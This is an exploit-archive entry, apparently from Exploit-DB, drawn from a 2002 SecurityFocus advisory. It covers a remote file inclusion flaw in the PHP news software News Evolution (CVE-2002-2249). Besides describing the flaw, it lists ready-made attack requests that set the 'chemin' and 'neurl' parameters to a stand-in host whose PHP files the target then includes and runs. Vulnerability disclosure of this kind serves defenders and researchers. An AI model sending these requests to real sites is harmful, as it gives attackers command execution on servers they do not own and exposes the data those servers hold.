News Evolution 1.0/2.0 - Include Undefined Variable Command Execution

Author: frog
type: webapps
platform: php
port: 
date_added: 2002-11-26  
date_updated: 2012-10-17  
verified: 1  
codes: CVE-2002-2249;OSVDB-58966  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22048.txt  
source: https://www.securityfocus.com/bid/6260/info

News Evolution is a freely available, open source news software package. It is written in PHP, and designed for use on Unix and Linux operating systems.

The problem occurs in the aff_news.php file. By loading this file, and defining the chemin variable to an arbitrary location, commands can be executed on the local host. This vulnerability may also be used to reveal sensitive information on the local host. This same vulnerability also occurs in the export_news.php file.

http://example.com/aff_news.php?chemin=http://example.org/ with

http://example.org/config.php
http://example.org/functions.inc.php
http://example.org/options.inc.php


http://example.com/screen.php?neurl=http://example.org with

http://example.org/admin/cfg/configsql.inc.php
http://example.org/admin/cfg/configscreen.inc.php
http://example.org/admin/cfg/configsite.inc.php
http://example.org/admin/cfg/configtache.inc.php
http://example.org/admin/fonctions/fctscr.php
http://example.org/admin/fonctions/fctadmin.php
http://example.org/admin/fonctions/fctform.php
http://example.org/admin/modules/cache.php